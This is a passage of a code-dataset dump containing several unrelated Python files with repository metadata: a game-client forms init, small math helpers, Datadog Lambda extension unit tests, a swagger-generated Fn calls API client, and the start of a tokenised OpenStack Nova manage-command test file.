] | 2 | 2020-03-31T17:18:38.000Z | 2020-03-31T17:21:13.000Z | timebomb/forms/__init__.py | thmslmr/timebomb-client | a57fdbb8bfc0157d2c3d713496ab4819fb33f1fd | [
"MIT"
] | null | null | null | from timebomb.forms.login import LoginForm # noqa
from timebomb.forms.game import GameForm # noqa
from timebomb.forms.wait import WaitingForm # noqa
from timebomb.forms.cut import CutForm # noqa
from timebomb.forms.notif import NotifForm # noqa
from timebomb.forms.end import EndForm # noqa
| 42.428571 | 51 | 0.79798 | 42 | 297 | 5.642857 | 0.404762 | 0.303797 | 0.43038 | 0.443038 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141414 | 297 | 6 | 52 | 49.5 | 0.929412 | 0.097643 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
883ccd2404f113a4c2a844aadd81a5ce7edf5d52 | 102 | py | Python | L5/packet/math_func.py | thebestday/python | 2efb7fbd5c4ee40c03233875c1989ce68aa0fe18 | [
"MIT"
] | null | null | null | L5/packet/math_func.py | thebestday/python | 2efb7fbd5c4ee40c03233875c1989ce68aa0fe18 | [
"MIT"
] | null | null | null | L5/packet/math_func.py | thebestday/python | 2efb7fbd5c4ee40c03233875c1989ce68aa0fe18 | [
"MIT"
] | null | null | null | fib_num_1 = lambda n: fib_num_1(n-1) + fib_num_1(n-2) if n > 2 else 1
def power(a,b):
return a**b | 25.5 | 69 | 0.637255 | 27 | 102 | 2.185185 | 0.481481 | 0.305085 | 0.355932 | 0.271186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08642 | 0.205882 | 102 | 4 | 70 | 25.5 | 0.641975 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
8882fa8f2fcf24a79f7d11485c626abe1b1bfe66 | 2,493 | py | Python | tests/test_extension.py | colinhoernig/datadog-lambda-python | b978f523c0954addeaed89d73266e2126a383d2a | [
"Apache-2.0"
] | 30 | 2020-08-12T12:32:57.000Z | 2022-03-28T09:37:17.000Z | tests/test_extension.py | colinhoernig/datadog-lambda-python | b978f523c0954addeaed89d73266e2126a383d2a | [
"Apache-2.0"
] | 54 | 2020-08-05T21:39:48.000Z | 2022-03-25T18:22:25.000Z | tests/test_extension.py | colinhoernig/datadog-lambda-python | b978f523c0954addeaed89d73266e2126a383d2a | [
"Apache-2.0"
] | 20 | 2020-08-19T18:52:12.000Z | 2022-03-13T06:48:08.000Z | import os
import unittest
import httpretty
from unittest.mock import patch
from datadog_lambda.extension import (
is_extension_running,
flush_extension,
should_use_extension,
)
def exceptionCallback(request, uri, headers):
raise Exception("oopsy!")
class TestLambdaExtension(unittest.TestCase):
@patch("datadog_lambda.extension.EXTENSION_PATH", os.path.abspath(__file__))
def test_is_extension_running_true(self):
httpretty.enable()
last_request = httpretty.last_request()
httpretty.register_uri(httpretty.GET, "http://127.0.0.1:8124/lambda/hello")
assert is_extension_running() == True
assert httpretty.last_request() != last_request
httpretty.disable()
def test_is_extension_running_file_not_found(self):
httpretty.enable()
last_request = httpretty.last_request()
httpretty.register_uri(httpretty.GET, "http://127.0.0.1:8124/lambda/hello")
assert is_extension_running() == False
assert httpretty.last_request() == last_request
httpretty.disable()
@patch("datadog_lambda.extension.EXTENSION_PATH", os.path.abspath(__file__))
def test_is_extension_running_http_failure(self):
httpretty.enable()
last_request = httpretty.last_request()
httpretty.register_uri(
httpretty.GET,
"http://127.0.0.1:8124/lambda/hello",
status=503,
body=exceptionCallback,
)
assert is_extension_running() == False
assert httpretty.last_request() != last_request
httpretty.disable()
@patch("datadog_lambda.extension.EXTENSION_PATH", os.path.abspath(__file__))
def test_flush_ok(self):
httpretty.enable()
last_request = httpretty.last_request()
httpretty.register_uri(httpretty.POST, "http://127.0.0.1:8124/lambda/flush")
assert flush_extension() == True
assert httpretty.last_request() != last_request
httpretty.disable()
@patch("datadog_lambda.extension.EXTENSION_PATH", os.path.abspath(__file__))
def test_flush_not_ok(self):
httpretty.enable()
last_request = httpretty.last_request()
httpretty.register_uri(
httpretty.POST,
"http://127.0.0.1:8124/lambda/flush",
status=503,
body=exceptionCallback,
)
assert flush_extension() == False
assert httpretty.last_request() != last_request
httpretty.disable()
| 34.625 | 84 | 0.67509 | 282 | 2,493 | 5.673759 | 0.187943 | 0.1375 | 0.1875 | 0.071875 | 0.80875 | 0.751875 | 0.751875 | 0.751875 | 0.751875 | 0.6775 | 0 | 0.028689 | 0.217008 | 2,493 | 71 | 85 | 35.112676 | 0.790984 | 0 | 0 | 0.540984 | 0 | 0 | 0.133173 | 0.062575 | 0 | 0 | 0 | 0 | 0.163934 | 1 | 0.098361 | false | 0 | 0.081967 | 0 | 0.196721 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ee1a2e0499af1a4ee43e5fa9264a494496d8b864 | 47 | py | Python | app/helpers/__init__.py | duanribeiro/Flask-RESTPlus_mongoDB_boilerplate | 21a36759c98f61b35d0318f579b1c65a50f5460e | [
"MIT"
] | 11 | 2019-10-03T18:47:49.000Z | 2022-02-01T10:42:02.000Z | app/helpers/__init__.py | duanribeiro/Flask-RESTPlus_mongoDB_boilerplate | 21a36759c98f61b35d0318f579b1c65a50f5460e | [
"MIT"
] | null | null | null | app/helpers/__init__.py | duanribeiro/Flask-RESTPlus_mongoDB_boilerplate | 21a36759c98f61b35d0318f579b1c65a50f5460e | [
"MIT"
] | 8 | 2019-10-03T18:47:53.000Z | 2021-06-07T14:47:51.000Z | from .parsers import *
from .password import *
| 15.666667 | 23 | 0.744681 | 6 | 47 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 24 | 23.5 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
c987f8e5819ed09167b55c880240fbab8ed007d9 | 21,100 | py | Python | swagger_client/apis/call_api.py | fnproject/fn_python | 79575fc4867378331602a52422bc808f0f808b50 | [
"Apache-2.0"
] | 6 | 2017-09-24T16:50:49.000Z | 2019-10-23T22:14:39.000Z | swagger_client/apis/call_api.py | fnproject/fn_python | 79575fc4867378331602a52422bc808f0f808b50 | [
"Apache-2.0"
] | null | null | null | swagger_client/apis/call_api.py | fnproject/fn_python | 79575fc4867378331602a52422bc808f0f808b50 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
fn
The open source serverless platform.
OpenAPI spec version: 0.2.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class CallApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def apps_app_calls_call_get(self, app, call, **kwargs):
"""
Get call information
Get call information
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.apps_app_calls_call_get(app, call, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str app: app name (required)
:param str call: Call ID. (required)
:return: CallWrapper
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.apps_app_calls_call_get_with_http_info(app, call, **kwargs)
else:
(data) = self.apps_app_calls_call_get_with_http_info(app, call, **kwargs)
return data
def apps_app_calls_call_get_with_http_info(self, app, call, **kwargs):
"""
Get call information
Get call information
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.apps_app_calls_call_get_with_http_info(app, call, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str app: app name (required)
:param str call: Call ID. (required)
:return: CallWrapper
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['app', 'call']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method apps_app_calls_call_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'app' is set
if ('app' not in params) or (params['app'] is None):
raise ValueError("Missing the required parameter `app` when calling `apps_app_calls_call_get`")
# verify the required parameter 'call' is set
if ('call' not in params) or (params['call'] is None):
raise ValueError("Missing the required parameter `call` when calling `apps_app_calls_call_get`")
collection_formats = {}
path_params = {}
if 'app' in params:
path_params['app'] = params['app']
if 'call' in params:
path_params['call'] = params['call']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/apps/{app}/calls/{call}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CallWrapper',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def apps_app_calls_call_log_delete(self, call, app, **kwargs):
"""
Delete call log entry
Delete call log entry
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.apps_app_calls_call_log_delete(call, app, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str call: Call ID. (required)
:param str app: App name. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.apps_app_calls_call_log_delete_with_http_info(call, app, **kwargs)
else:
(data) = self.apps_app_calls_call_log_delete_with_http_info(call, app, **kwargs)
return data
def apps_app_calls_call_log_delete_with_http_info(self, call, app, **kwargs):
"""
Delete call log entry
Delete call log entry
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.apps_app_calls_call_log_delete_with_http_info(call, app, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str call: Call ID. (required)
:param str app: App name. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['call', 'app']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method apps_app_calls_call_log_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'call' is set
if ('call' not in params) or (params['call'] is None):
raise ValueError("Missing the required parameter `call` when calling `apps_app_calls_call_log_delete`")
# verify the required parameter 'app' is set
if ('app' not in params) or (params['app'] is None):
raise ValueError("Missing the required parameter `app` when calling `apps_app_calls_call_log_delete`")
collection_formats = {}
path_params = {}
if 'call' in params:
path_params['call'] = params['call']
if 'app' in params:
path_params['app'] = params['app']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/apps/{app}/calls/{call}/log', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def apps_app_calls_call_log_get(self, app, call, **kwargs):
"""
Get call logs
Get call logs
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.apps_app_calls_call_log_get(app, call, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str app: App Name (required)
:param str call: Call ID. (required)
:return: LogWrapper
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.apps_app_calls_call_log_get_with_http_info(app, call, **kwargs)
else:
(data) = self.apps_app_calls_call_log_get_with_http_info(app, call, **kwargs)
return data
def apps_app_calls_call_log_get_with_http_info(self, app, call, **kwargs):
"""
Get call logs
Get call logs
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.apps_app_calls_call_log_get_with_http_info(app, call, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str app: App Name (required)
:param str call: Call ID. (required)
:return: LogWrapper
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['app', 'call']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method apps_app_calls_call_log_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'app' is set
if ('app' not in params) or (params['app'] is None):
raise ValueError("Missing the required parameter `app` when calling `apps_app_calls_call_log_get`")
# verify the required parameter 'call' is set
if ('call' not in params) or (params['call'] is None):
raise ValueError("Missing the required parameter `call` when calling `apps_app_calls_call_log_get`")
collection_formats = {}
path_params = {}
if 'app' in params:
path_params['app'] = params['app']
if 'call' in params:
path_params['call'] = params['call']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/apps/{app}/calls/{call}/log', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LogWrapper',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def apps_app_calls_get(self, app, **kwargs):
"""
Get app-bound calls.
Get app-bound calls can filter to route-bound calls, results returned in created_at, descending order (newest first).
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.apps_app_calls_get(app, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str app: App name. (required)
:param str path: Route path to match, exact.
:param str cursor: Cursor from previous response.next_cursor to begin results after, if any.
:param int per_page: Number of results to return, defaults to 30. Max of 100.
:param int from_time: Unix timestamp in seconds, of call.created_at to begin the results at, default 0.
:param int to_time: Unix timestamp in seconds, of call.created_at to end the results at, defaults to latest.
:return: CallsWrapper
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.apps_app_calls_get_with_http_info(app, **kwargs)
else:
(data) = self.apps_app_calls_get_with_http_info(app, **kwargs)
return data
def apps_app_calls_get_with_http_info(self, app, **kwargs):
"""
Get app-bound calls.
Get app-bound calls can filter to route-bound calls, results returned in created_at, descending order (newest first).
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.apps_app_calls_get_with_http_info(app, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str app: App name. (required)
:param str path: Route path to match, exact.
:param str cursor: Cursor from previous response.next_cursor to begin results after, if any.
:param int per_page: Number of results to return, defaults to 30. Max of 100.
:param int from_time: Unix timestamp in seconds, of call.created_at to begin the results at, default 0.
:param int to_time: Unix timestamp in seconds, of call.created_at to end the results at, defaults to latest.
:return: CallsWrapper
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['app', 'path', 'cursor', 'per_page', 'from_time', 'to_time']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method apps_app_calls_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'app' is set
if ('app' not in params) or (params['app'] is None):
raise ValueError("Missing the required parameter `app` when calling `apps_app_calls_get`")
collection_formats = {}
path_params = {}
if 'app' in params:
path_params['app'] = params['app']
query_params = []
if 'path' in params:
query_params.append(('path', params['path']))
if 'cursor' in params:
query_params.append(('cursor', params['cursor']))
if 'per_page' in params:
query_params.append(('per_page', params['per_page']))
if 'from_time' in params:
query_params.append(('from_time', params['from_time']))
if 'to_time' in params:
query_params.append(('to_time', params['to_time']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/apps/{app}/calls', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CallsWrapper',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.617357 | 125 | 0.571754 | 2,304 | 21,100 | 5.002604 | 0.084635 | 0.055527 | 0.040604 | 0.041645 | 0.942218 | 0.928943 | 0.921742 | 0.912285 | 0.90734 | 0.898751 | 0 | 0.0013 | 0.343981 | 21,100 | 506 | 126 | 41.699605 | 0.831383 | 0.331754 | 0 | 0.731707 | 1 | 0 | 0.16629 | 0.046486 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036585 | false | 0 | 0.028455 | 0 | 0.117886 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c9d19f59cec62b9f8ee1318f1aa3cade9aa30b5f | 84,262 | py | Python | nova/tests/unit/test_nova_manage.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/test_nova_manage.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/test_nova_manage.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | 2 | 2017-07-20T17:31:34.000Z | 2020-07-24T02:42:19.000Z | begin_unit
comment|'# Copyright 2011 OpenStack Foundation'
nl|'\n'
comment|'# Copyright 2011 Ilya Alekseyev'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'from'
name|'six'
op|'.'
name|'moves'
name|'import'
name|'StringIO'
newline|'\n'
name|'import'
name|'sys'
newline|'\n'
nl|'\n'
name|'import'
name|'fixtures'
newline|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'from'
name|'oslo_utils'
name|'import'
name|'uuidutils'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
op|'.'
name|'cmd'
name|'import'
name|'manage'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'conf'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'context'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'db'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'db'
name|'import'
name|'migration'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'db'
op|'.'
name|'sqlalchemy'
name|'import'
name|'migration'
name|'as'
name|'sqla_migration'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'objects'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'db'
name|'import'
name|'fakes'
name|'as'
name|'db_fakes'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'fake_instance'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'objects'
name|'import'
name|'test_network'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'test_flavors'
newline|'\n'
nl|'\n'
DECL|variable|CONF
name|'CONF'
op|'='
name|'conf'
op|'.'
name|'CONF'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|FixedIpCommandsTestCase
name|'class'
name|'FixedIpCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'TestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'FixedIpCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'db_fakes'
op|'.'
name|'stub_out_db_network_api'
op|'('
name|'self'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'FixedIpCommands'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reserve
dedent|''
name|'def'
name|'test_reserve'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'commands'
op|'.'
name|'reserve'
op|'('
string|"'192.168.0.100'"
op|')'
newline|'\n'
name|'address'
op|'='
name|'db'
op|'.'
name|'fixed_ip_get_by_address'
op|'('
name|'context'
op|'.'
name|'get_admin_context'
op|'('
op|')'
op|','
nl|'\n'
string|"'192.168.0.100'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'address'
op|'['
string|"'reserved'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reserve_nonexistent_address
dedent|''
name|'def'
name|'test_reserve_nonexistent_address'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'self'
op|'.'
name|'commands'
op|'.'
name|'reserve'
op|'('
string|"'55.55.55.55'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_unreserve
dedent|''
name|'def'
name|'test_unreserve'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'commands'
op|'.'
name|'unreserve'
op|'('
string|"'192.168.0.100'"
op|')'
newline|'\n'
name|'address'
op|'='
name|'db'
op|'.'
name|'fixed_ip_get_by_address'
op|'('
name|'context'
op|'.'
name|'get_admin_context'
op|'('
op|')'
op|','
nl|'\n'
string|"'192.168.0.100'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'address'
op|'['
string|"'reserved'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_unreserve_nonexistent_address
dedent|''
name|'def'
name|'test_unreserve_nonexistent_address'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'self'
op|'.'
name|'commands'
op|'.'
name|'unreserve'
op|'('
string|"'55.55.55.55'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_list
dedent|''
name|'def'
name|'test_list'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
string|"'sys.stdout'"
op|','
nl|'\n'
name|'StringIO'
op|'('
op|')'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'list'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotEqual'
op|'('
number|'1'
op|','
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|'.'
name|'find'
op|'('
string|"'192.168.0.100'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_list_just_one_host
dedent|''
name|'def'
name|'test_list_just_one_host'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_fixed_ip_get_by_host
indent|' '
name|'def'
name|'fake_fixed_ip_get_by_host'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
op|'['
name|'db_fakes'
op|'.'
name|'fixed_ip_fields'
op|']'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
nl|'\n'
string|"'nova.db.fixed_ip_get_by_host'"
op|','
nl|'\n'
name|'fake_fixed_ip_get_by_host'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
string|"'sys.stdout'"
op|','
nl|'\n'
name|'StringIO'
op|'('
op|')'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'list'
op|'('
string|"'banana'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotEqual'
op|'('
number|'1'
op|','
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|'.'
name|'find'
op|'('
string|"'192.168.0.100'"
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|FloatingIpCommandsTestCase
dedent|''
dedent|''
name|'class'
name|'FloatingIpCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'FloatingIpCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'db_fakes'
op|'.'
name|'stub_out_db_network_api'
op|'('
name|'self'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'FloatingIpCommands'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_address_to_hosts
dedent|''
name|'def'
name|'test_address_to_hosts'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|assert_loop
indent|' '
name|'def'
name|'assert_loop'
op|'('
name|'result'
op|','
name|'expected'
op|')'
op|':'
newline|'\n'
indent|' '
name|'for'
name|'ip'
name|'in'
